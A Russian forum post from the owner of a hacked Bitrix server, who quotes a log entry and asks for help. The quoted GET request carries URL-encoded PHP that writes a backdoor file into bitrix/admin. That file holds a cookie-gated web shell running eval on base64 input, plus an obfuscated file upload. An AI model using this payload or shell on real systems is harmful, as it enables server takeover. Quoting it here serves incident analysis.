03.03.2025 был взломан сайт сервер на сервере bitrixbm, далее были получены права root , грохнуто было все. В логах сервера был обнаружен вот такой запрос GET
| Код |
|---|
"GET /?midog=%24s%3D%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27%2F%27%3B%24s1%3D%24s.%27bitrix%2Fadmin%2F%27%3B%0A%09%24fh%3Dfopen%28%24s1.%27accesson.php%27%2C%27w%27%29%3B%0A%09fwrite%28%24fh%2C%27%3C%3Fphp+echo+409723%2A20%3Bif%28md5%28%24_COOKIE%5B%22d%22%5D%29%3D%3D%22%5C61%5Cx37%5C60%5C62%5Cx38%5C146%5Cx34%5C70%5C67%5C143%5C142%5Cx32%5C141%5C70%5Cx34%5Cx36%5Cx30%5C67%5Cx36%5C64%5Cx36%5Cx64%5C141%5C63%5C141%5C144%5C63%5C70%5C67%5Cx38%5C145%5C143%22%29%7Becho%22%5Cx6f%5Cx6b%22%3Beval%28base64_decode%28%24_REQUEST%5B%22id%22%5D%29%29%3Bif%28%24_POST%5B%22%5C165%5C160%22%5D%3D%3D%22%5C165%5Cx70%22%29%7B%40copy%28%24_FILES%5B%22%5Cx66%5C151%5Cx6c%5Cx65%22%5D%5B%22%5C164%5C155%5Cx70%5Cx5f%5Cx6e%5Cx61%5Cx6d%5Cx65%22%5D%2C%24_FILES%5B%22%5C146%5Cx69%5C154%5Cx65%22%5D%5B%22%5C156%5C141%5C155%5Cx65%22%5D%29%3B%7D%7D%3F%3E%0A%27%29%3B%0A%09fclose%28%24fh%29%3B HTTP/1.1" Прошу поделиться информацией, не удаляйте тему разработчики.. |